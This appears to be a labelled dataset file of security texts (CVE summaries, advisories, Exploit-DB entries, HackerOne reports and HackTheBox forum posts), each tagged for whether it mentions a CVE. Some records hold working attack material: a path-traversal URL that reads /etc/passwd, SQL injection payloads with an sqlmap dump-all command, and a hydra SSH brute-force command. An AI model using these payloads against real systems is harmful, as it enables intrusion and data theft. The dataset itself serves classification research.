+{"id": "0c88787bd7dbc059589f", "text": "Brainfuck admin page\n\nThere is no config pages in admin its just a profile page i have administrator access by privillage esculation exploit", "source": "hackthebox", "timestamp": "2022-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "03036f25c444426993b1", "text": "CVE: CVE-2022-1727\n\n[{'lang': 'en', 'value': 'Improper Input Validation in GitHub repository jgraph/drawio prior to 18.0.6.'}]\n\nFix commit: 18.0.4 release", "source": "cvefixes", "timestamp": "2022-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "867111fd0792ddd76eb5", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-05-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a2ff4ac0aadaf1281530", "text": "SolarView Compact 6.00 - Directory Traversal\n\n# Exploit Title: SolarView Compact 6.00 - Directory Traversal\n# Date: 2022-05-15\n# Exploit Author: Ahmed Alroky\n# Author Company : Aiactive\n# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/\n# Version: ver.6.00\n# Vendor home page : https://www.contec.com/\n# Authentication Required: No\n# CVE : CVE-2022-29298\n\n# Tested on: Windows\n\n# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg", "source": "exploitdb", "timestamp": "2022-06-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d4c4332ca1647713cf7f", "text": "No You have to bruteforce absolutely nothing. Find the right list of default passwords.", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e53d063b645ae1972a02", "text": "Thank you @onthesauce for awesome help. You are nothing short of awesomeness. My two cents to whoever follows this post in search of hints to solve is that try every combinations and dont hesitate to add up your reply for more help. If you happen to use chrome to solve this assessment, solution may not show up on the page even after you had already solved it. As for me chrome was not showing any message from the server like ‘Access Denied’ or ‘File copy errors’ and so on. However, they were visible when I inspected it in the code inspector, went on to network tab and checked in the preview tab. It may be visible to you if you are using mozilla anyways.", "source": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fcb3bb13d6644ed780a4", "text": "I thought the ${LS_COLORS:10:1} would come from the printenv command and would assume the ; caracter. I have reached the injection point, i can already see the whoami and ls o’u’t’pu’ts but i cant cat the file.", "source": "hackthebox", "timestamp": "2022-07-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e66ff53a2f5a72664259", "text": "[Code Injection] CVE-2023-5528: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes\n\nThis is an imported report from the email i have sent a month ago about a code injection vulnerability\nThe vulnerability was assigned as CVE-2023-5528\nAs a reference i have talked with Balaji from the k8 team.\nExcerpts from the email chain that might be relevant:\n\n\"Just a quick update to let you know that we were able to reproduce the issue and are working on a fix. CVE-2023-5528 has been reserved for this issue. We'll keep you updated on the next steps as we review the proposed fix.\"\n\n\"Hi Tomer,\nThis is being rated as a Tier 1 High severity ($5,000) bounty.\"\n\nThe vulnerability was verified and assigned a CVE by the k8 team\n\n## Impact\n\nCode execution from kubelet context(SYSYTEM privileges) on all windows nodes on a cluster.", "source": "hackerone", "timestamp": "2023-12-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "515a882fd679542f13b6", "text": "CVE: CVE-2022-0589\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist librenms/librenms prior to 22.1.0.'}]\n\nFix commit: XSS fixes (#13780)", "source": "cvefixes", "timestamp": "2022-02-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4cde88042c5490fb4c2c", "text": "It probably will take forever if you’re using the /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt . Consider using wordlists that are using common names. If the wordlist is sorted alphabetically, the hit will be near the bottom…not a big fan of how long to wait on some of these assessments.", "source": "hackthebox", "timestamp": "2023-01-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f148a03f0e372e1a231a", "text": "CVE: CVE-2022-23653\n\n[{'lang': 'en', 'value': 'B2 Command Line Tool is the official command line tool for the backblaze cloud storage service. Linux and Mac releases of the B2 command-line tool version 3.2.0 and below contain a key disclosure vulnerability that, in certain conditions, can be exploited by local attackers through a time-of-check-time-of-use (TOCTOU) race condition. The command line tool saves API keys (and bucket name-to-id mapping) in a local database file (`$XDG_CONFIG_HOME/b2/account_info`, `~/.b2_account_info` or a user-defined path) when `b2 authorize-account` is first run. This happens regardless of whether a valid key is provided or not. When first created, the file is world readable and is (typically a few milliseconds) later altered to be private to the user. If the directory is readable by a local attacker and the user did not yet run `b2 authorize-account` then during the brief period between file creation and permission modification, a local attacker can race to open the file and maintain a handle to it. This allows the local attacker to read the contents after the file after the sensitive information has been saved to it. Users that have not yet run `b2 authorize-account` should upgrade to B2 Command-Line Tool v3.2.1 before running it. Users that have run `b2 authorize-account` are safe if at the time of the file creation no other local users had read access to the local configuration file. Users that have run `b2 authorize-account` where the designated path could be opened by another local user should upgrade to B2 Command-Line Tool v3.2.1 and remove the database and regenerate all application keys. Note that `b2 clear-account` does not remove the database file and it should not be used to ensure that all open handles to the file are invalidated. If B2 Command-Line Tool cannot be upgraded to v3.2.1 due to a dependency conflict, a binary release can be used instead. Alternatively a new version could be installed within a virtualenv, or the permissions can be changed to prevent local users from opening the database file.'}]\n\nFix commit: Release v3.2.1", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "efa486134b876999b4b9", "text": "Been stuck on this one for 4 days. Still stuck on first question trying to brute force the ssh login. Created personalized wordlist using Firstname William, Surname Gates, Nickname Bill. Using sed to shorten it to meet password requirements. Can’t get a hit on the password. Tried using rockyou-70 as well just incase I misunderstood. Command I’m using is hydra -l b.gates -P William.txt -u -f ssh://IP_Address:Port -t 4 Any guidance would be much appreciated!", "source": "hackthebox", "timestamp": "2023-09-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "7402d9d9fd36a341997a", "text": "CVE: CVE-2022-29184\n\n[{'lang': 'en', 'value': 'GoCD is a continuous delivery server. In GoCD versions prior to 22.1.0, it is possible for existing authenticated users who have permissions to edit or create pipeline materials or pipeline configuration repositories to get remote code execution capability on the GoCD server via configuring a malicious branch name which abuses Mercurial hooks/aliases to exploit a command injection weakness. An attacker would require access to an account with existing GoCD administration permissions to either create/edit (`hg`-based) configuration repositories; create/edit pipelines and their (`hg`-based) materials; or, where \"pipelines-as-code\" configuration repositories are used, to commit malicious configuration to such an external repository which will be automatically parsed into a pipeline configuration and (`hg`) material definition by the GoCD server. This issue is fixed in GoCD 22.1.0. As a workaround, users who do not use/rely upon Mercurial materials can uninstall/remove the `hg`/Mercurial binary from the underlying GoCD Server operating system or Docker image.'}]\n\nFix commit: Improve escaping of arguments when constructing Hg command calls", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "964907b35ec051e8ab30", "text": "can you help me the diggin in part i can’t get the flag", "source": "hackthebox", "timestamp": "2023-02-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b525648476967da1acc2", "text": "I do it in this way and work very perfect netstat -luntp | grep “0.0.0.” | grep -v “127.0.0” | grep “LISTEN” | wc -l 2>/dev/null", "source": "hackthebox", "timestamp": "2022-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "aa0bbb8fbcf64895e133", "text": "I hope you find this helpful, MoCA adapters and network extenders offer throughput speeds of up to 2.5Gbps and are perfect for removing dead spots in your network. They are an excellent way to improve a home or corporate network without installing new wiring since they work off of existing coaxial cables. They offer high security, too, and are relatively simple to install. Whether you want to stream your videos at the highest quality possible, up your online gameplay or improve your company’s efficiency, MoCA technology can help.", "source": "hackersploit", "timestamp": "2022-03-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "831edfd9667c04f4c85e", "text": "Ivanti Endpoint Manager Mobile (EPMM) Path Traversal Vulnerability\n\nAffected: Ivanti Endpoint Manager Mobile (EPMM)\n\nIvanti Endpoint Manager Mobile (EPMM) contains a path traversal vulnerability that enables an authenticated administrator to perform malicious file writes to the EPMM server. This vulnerability can be used in conjunction with CVE-2023-35078 to bypass authentication and ACLs restrictions (if applicable).\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "source": "cisa_kev", "timestamp": "2023-07-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d3654f5191b98a1965b2", "text": "@kkkkkkk some of the target machines are pretty complex, after you spawn the target it may take up to 5 or 10 minutes to actually deploy the docker instance. I know it gives you the IP address right away. But give it time. Some of the WordPress and Session Security exercises seem to take forever to load. These things are not instantaneous. Just give it a few more seconds to load lol. -onthesauce", "source": "hackthebox", "timestamp": "2022-10-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1ae4312229243bc1cef3", "text": "CVE: CVE-2022-1782\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository erudika/para prior to v1.45.11.'}]\n\nFix commit: added option to escape HTML when compiling Mustache templates", "source": "cvefixes", "timestamp": "2022-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d38fcfde9f9067ff85b5", "text": "yep, “just run everything with sudo” means there’s no use for sudo and you might as well just log in as root. On the next set of questions, one question is about running tcpdump to capture traffic on an interface. The accepted answer does not include sudo - in real life, without some fiddling, this will actually need sudo", "source": "hackthebox", "timestamp": "2022-06-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "32ba4f473d3c65be0fd0", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-08-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4675640f85617508829d", "text": "Virtualenv \"bash: python: command not found\"\n\nWhen using VScodium and creating a folder I’m getting this error message after trying to create a virtualenv with ‘python -m venv name’ inside my directory of interest: “bash: python: command not found”. I tried to solve it by installing - ‘sudo apt install python3-virtualenv’ but no luck, the error persist. Does anybody know what it’s missing???", "source": "parrotsec", "timestamp": "2023-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c818e69a006f5830bce3", "text": "CVE: CVE-2022-28959\n\n[{'lang': 'en', 'value': 'Multiple cross-site scripting (XSS) vulnerabilities in the component /spip.php of Spip Web Framework v3.1.13 and below allows attackers to execute arbitrary web scripts or HTML.'}]\n\nFix commit: Divers petites sanitization et une balise manquante #4494", "source": "cvefixes", "timestamp": "2022-05-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8acb9d8f9e08ac3f1b3e", "text": "Hi, How did you get the result of Harry is 1337?. What method did you used?", "source": "hackthebox", "timestamp": "2022-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "084647247b6feaa02db2", "text": "CVE: CVE-2022-24769\n\n[{'lang': 'en', 'value': \"Moby is an open-source project created by Docker to enable and accelerate software containerization. A bug was found in Moby (Docker Engine) prior to version 20.10.14 where containers were incorrectly started with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during `execve(2)`. Normally, when executable programs have specified permitted file capabilities, otherwise unprivileged users and processes can execute those programs and gain the specified file capabilities up to the bounding set. Due to this bug, containers which included executable programs with inheritable file capabilities allowed otherwise unprivileged users and processes to additionally gain these inheritable file capabilities up to the container's bounding set. Containers which use Linux users and groups to perform privilege separation inside the container are most directly impacted. This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in Moby (Docker Engine) 20.10.14. Running containers should be stopped, deleted, and recreated for the inheritable capabilities to be reset. This fix changes Moby (Docker Engine) behavior such that containers are started with a more typical Linux environment. As a workaround, the entry point of a container can be modified to use a utility like `capsh(1)` to drop inheritable capabilities prior to the primary process starting.\"}]\n\nFix commit: Merge pull request from GHSA-2mm7-x5h6-5pvq\n\noci: inheritable capability set should be empty", "source": "cvefixes", "timestamp": "2022-03-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8bf2aa353829870b4011", "text": "CVE: CVE-2021-43515\n\n[{'lang': 'en', 'value': 'CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file.'}]\n\nFix commit: version 1.14.1 (#2532)\n\n* no back links in modal pages\r\n* remove unused service links to bountysource and gitter\r\n* add validation for budget and time-budget fields\r\n* display time budget if set\r\n* remove console log\r\n* sanitize DDE payloads\r\n* do not show status and name in version string", "source": "cvefixes", "timestamp": "2022-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a49568c7a67762bd5a89", "text": ".NET Information Disclosure Vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-35391: .NET Information Disclosure Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in ASP.NET core 2.1, .NET 6.0 and, .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in ASP.NET Core 2.1, .NET 6.0 and, .NET 7.0 applications using SignalR when redis backplane use might result in information disclosure.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/267\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 7.0 application running on .NET 7.0.9 or earlier.\n* Any .NET 6.0 application running on .NET 6.0.20 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 7.0.0, <= 7.0.9 | 7.0.10\n\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.SignalR.StackExchangeRedis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.StackExchangeRedis) | >= 6.0.0, <= 6.0.20 | 6.0.21\n\n### ASP.NET Core 2.1\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.SignalR.Redis](https://www.nuget.org/packages/Microsoft.AspNetCore.SignalR.Redis) | < 1.0.40 | 1.0.40\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you are using one of the affected packages, please update to the patched version listed above.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.300\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.300 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.NETCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App]\n Microsoft.WindowsDesktop.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.110 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.\n* If you're using .NET 6.0, you should download and install Runtime 6.0.21 or SDK 6.0.316 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 6.0 and and .NET 7.0 updates are also available from Microso", "source": "github_advisory", "timestamp": "2023-08-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8b3bc765b241567eea86", "text": "[Uncontrolled Resource Consumption] [CVE-2022-44571] Possible Denial of Service Vulnerability in Rack Content-Disposition parsing\n\nI made a report and patch at https://hackerone.com/reports/1675235\n\nhttps://discuss.rubyonrails.org/t/cve-2022-44571-possible-denial-of-service-vulnerability-in-rack-content-disposition-parsing/82126\n\n> There is a denial of service vulnerability in the Content-Disposition parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44571.\n> Carefully crafted input can cause Content-Disposition header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. This header is used typically used in multipart parsing. Any applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\n\n## Impact\n\nAny applications that parse multipart posts using Rack (virtually all Rails applications) are impacted.\nSince it is a manipulation of the request body, it is possible to bypass the request header size limit and make more dangerous attacks.\n\nIt was possible to attack ReDoS on many servers without authentication, but in the case of this regular expression, if it is ruby 3.2 or higher, there is a memoization countermeasure, so it is not a threat.", "source": "hackerone", "timestamp": "2023-07-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "8b86b30945bcddfc1976", "text": "CVE: CVE-2022-29156\n\n[{'lang': 'en', 'value': 'drivers/infiniband/ulp/rtrs/rtrs-clt.c in the Linux kernel before 5.16.12 has a double free related to rtrs_clt_dev_release.'}]\n\nFix commit: RDMA/rtrs-clt: Fix possible double free in error case\n\nCallback function rtrs_clt_dev_release() for put_device() calls kfree(clt)\nto free memory. We shouldn't call kfree(clt) again, and we can't use the\nclt after kfree too.\n\nReplace device_register() with device_initialize() and device_add() so that\ndev_set_name can() be used appropriately.\n\nMove mutex_destroy() to the release function so it can be called in\nthe alloc_clt err path.\n\nFixes: eab098246625 (\"RDMA/rtrs-clt: Refactor the failure cases in alloc_clt\")\nLink: https://lore.kernel.org/r/20220217030929.323849-1-haris.iqbal@ionos.com\nReported-by: Miaoqian Lin \nSigned-off-by: Md Haris Iqbal \nReviewed-by: Jack Wang \nSigned-off-by: Jason Gunthorpe ", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "de46003ff11ed8723e7a", "text": "REDCap 11.3.9 - Stored Cross Site Scripting\n\n# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting\n# Date: 2021-10-11\n# Exploit Author: Kendrick Lam\n# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js\n# Vendor Homepage: https://projectredcap.org\n# Software Link: https://projectredcap.org\n# Version: Redcap before 11.4.0\n# Tested on: 11.2.5\n# CVE: CVE-2021-42136\n# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf\n\n### Stored XSS – Missing Data Code Value (found by Kendrick Lam)\n\nIt was possible to store JavaScript as values for Missing Data Codes.\n\n- Where: Missing Data Code.\n- Payload:\n\t\t\n- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).\n- Privileges: Low privileged / regular user\n- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX\n\n- Privileges:\n + Store: Low privileged user is able to store Missing Data Code values.\n + Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX", "source": "exploitdb", "timestamp": "2022-04-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "52103099e28af24e11a7", "text": "Performing an attack from one separate network to another different network resource is possible using several techniques, such as port scanning, network mapping, and exploiting vulnerabilities in network devices or applications. However, performing such an attack without proper authorization is illegal and unethical. I cannot provide instructions on how to perform such an attack. Regarding your question about performing a low-level intensity attack on the HTTP protocol on an MS Windows webserver, I cannot provide guidance on performing attacks as it goes against ethical standards. However, I can suggest that you study and understand the HTTP protocol, web application architecture, and common web application vulnerabilities. You can use various tools such as Burp Suite, OWASP ZAP, or Nmap for web application penetration testing. Additionally, you can use Wireshark to capture network traffic on a standalone server. It's important to note that ethical hacking or penetration testing should only be done with proper authorization and should be performed in a controlled environment to prevent any harm to the target network or system. It's recommended that you seek proper training and certification before attempting any such activities.", "source": "go4expert", "timestamp": "2023-02-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4efab9686a3db48f9260", "text": "Hey dude, It sounds like you are going hella above and beyond for this challenge. You look to be in the right place, but you shouldn’t need all the advanced payloads that you are trying to use. Feel free to DM me and I will see if I can point you in a better direction. -onthesauce", "source": "hackthebox", "timestamp": "2022-11-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1c98e34a1c3cb5242628", "text": "There are only two chipsets that serious cybersecurity specialists do recommend, the Atheros AR9271 and the Realtek RTL8812AU. For more information related to these chipsets, you may find David Bombal’s YT videos useful. Or you know, google it. If you want to do packet injection and monitor nearby networks you gotta have an adapter that has these capabilities. There are more out there, other chipsets but I honestly believe these are the best money can buy, Both chipsets can be found in the ALFA adapters which everyone agrees are the best. Which specific adapter, there are a few, depends on your budget, how easy are to conceal and of course, availability, not everyone lives in a country where ALFA products will be easy to find. A more affordable option is the TP-Link WN722N version 1, it comes with the Atheros chipset and I think works out of the box, aka plug and play, but today’s market has only version 2 or 3 available which cant do monitor mode and packet injection without drivers and help. If you find a version 1 adapter you are a lucky man, if not Bombal’s videos help you to install the drivers, and voila, within minutes your TP-Link will work but bear in mind the chipset isn’t the Atheros or the Realtek 8812au, rather another version, can’t remember which one now. It will work but in terms of performance and quality is considered inferior quality. I talked about brands but more important than the brand is the chipset which, if you are lucky, you can find in unbranded generic adapters like the Wifi Nation and others. Mine is an unbranded one with the RTL8812AU chipset. If you find a cheaper unbranded adapter that comes in cheap miserable packaging but the chipset is one of the two, then go get it. Keep in mind that Atheros is single-band only, 2.4 while the RTL is dual, 2.4 and 5.8 I hope you find this information useful.", "source": "hackersploit", "timestamp": "2022-04-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "43932b5133fef524db0b", "text": "What I did is after each change happen in rdx i coppied it and combine them and then used loader.py and put the hex values combined without the 0x and it worked.", "source": "hackthebox", "timestamp": "2023-10-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "3ef030c81d81d1c69a65", "text": "Stored XSS vulnerability in Jenkins Custom Checkbox Parameter Plugin\n\n[Severity: HIGH]\n\nCustom Checkbox Parameter Plugin 1.4 and earlier does not escape the name and description of the parameter types it provides.\n\nThis results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-10-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "bd841e264b73ddf54a6e", "text": "Hey! anyone getting stuck at this question just make sure to use the virtual machine (pwnbox) , just make your for-loop as you know and submit the flag (use all the code). (not all packages are installed at kali so use the docker machine)", "source": "hackthebox", "timestamp": "2022-05-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a198e03e380b48c758bd", "text": "CVE: CVE-2014-0156\n\n[{'lang': 'en', 'value': 'Awesome spawn contains OS command injection vulnerability, which allows execution of additional commands passed to Awesome spawn as arguments. If untrusted input was included in command arguments, attacker could use this flaw to execute arbitrary command.'}]\n\nFix commit: Separate command line building and sanitizing into its own class.", "source": "cvefixes", "timestamp": "2022-06-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fb3c34396f9df370f1d2", "text": "Hello. I’m still a newbie at this. However, I tried what you suggested in your answer. I used dig and identified the subdomains which allowed zone transfer. I enumerated the subdomains that don’t allow zone transfer. And yet, I am still lost and couldn’t figure out the solution to this question. Any more hints would be helpful since I feel frustrated and lost and spent too much time on this problem. thanks", "source": "hackthebox", "timestamp": "2022-02-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d8f6c237bb43a32af544", "text": "Hi @EM472020 Have you looked at crontab? Knowledge Base by phoenixNAP – 28 Oct 20 Crontab Reboot: Execute a Job Automatically at Boot | phoenixNAP The Cron daemon is a Linux utility used for scheduling tasks. Learn how to configure cron jobs to run automatically on boot. Est. reading time: 3 minutes", "source": "parrotsec", "timestamp": "2023-08-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "aa55b1988b55716f22bd", "text": "Hey, Regarding the malicious employ, does he login trough HTTP or he is login with a different protocol. Because i was able to find the name of the picture but i am not able to find the username. I found from the logs that was added a username in Windows with password but this username is not the correct one. Could you please give a little bit hint, how to find the employee because the question is not so clear. Thanks in advance.", "source": "hackthebox", "timestamp": "2022-04-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "439e8532a51327268731", "text": "I am also having issue with the final assessment. I didn’t think to take notes when completing the earlier labs. I have gathered from reading the threads that Harry Potter was the employee we found earlier. I have tried to go back into that lab to see what the password requirements were and any other clues etc. But it will not let me back onto that page, perhaps because I already completed with and input the flag? I tried using CUPP with Harry and Harry Potter. I also used the usernameGenerator with Harry Potter and have tried hyrda attacking ssh with those two lists I generated. Can someone help point me in what I am missing please?", "source": "hackthebox", "timestamp": "2022-01-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "868de3d5c6c221e2e2d8", "text": "CVE: CVE-2022-0896\n\n[{'lang': 'en', 'value': 'Improper Neutralization of Special Elements Used in a Template Engine in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update AdminCommentController.php", "source": "cvefixes", "timestamp": "2022-03-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3134720f7014f25e4840", "text": "CVE: CVE-2022-21159\n\n[{'lang': 'en', 'value': 'A denial of service vulnerability exists in the parseNormalModeParameters functionality of MZ Automation GmbH libiec61850 1.5.0. A specially-crafted series of network requests can lead to denial of service. An attacker can send a sequence of malformed iec61850 messages to trigger this vulnerability.'}]\n\nFix commit: - fixed - Bug in presentation layer parser can cause infinite loop (LIB61850-302)", "source": "cvefixes", "timestamp": "2022-04-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2b6f55b3d5cc573ff1be", "text": "Does someone else have a 504 Gateway Timeout on PHP file? I lost my reverse shell after a Ctrl+C but couldn’t resend my payload because every PHP page send a 504. Root HTML works fine though. I’m on EU Fortress 1", "source": "hackthebox", "timestamp": "2023-10-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "24ec0cb4820255ca1d06", "text": "Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated\n\n# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated\n# Date: 20/01/2023\n# Exploit Author: Rahul Patwari\n# Vendor Homepage: https://phpgurukul.com/\n# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip\n# Version: 1.0\n# Tested on: XAMPP / Windows 10\n# CVE : CVE-2023-23163\n\n# Proof of Concept:\n\n# 1- Install The application Art Gallery Management System Project v1.0\n\n# 2- Navigate to admin login page and login with the valid username and password.\n URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php\n\n# 3- Now navigate \"Manage ART TYPE\" by clicking on \"ART TYPE\" option on left side bar.\n\n# 4- Now click on any of the Art Type \"Edit\" button and you will redirect to the edit page of art type.\n\n# 5- Now insert a single quote ( ' ) on \"editid\" parameter to break the database query, you will see the output is not shows.\n\n# 6- Now inject the payload double single quote ('') in the \"editid\" parameter to merge the database query and after sending this request the SQL query is successfully performed and product is shows in the output.\n\n# 7- Now find how many column are returns by the SQL query. this query will return 6 column.\n Payload:editid=6%27order%20by%203%20--%20-\n\n# 8- For manually get data of database insert the below payload to see the user of the database.\n payload: editid=-6%27union%20all%20select%201,user(),3--%20-\n\n# 9- Now to get all database data use below \"sqlmap\" command to fetch all the data.\n Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie=\"PHPSESSID=hub8pub9s5c1j18cva9594af3q\" --dump-all --batch", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
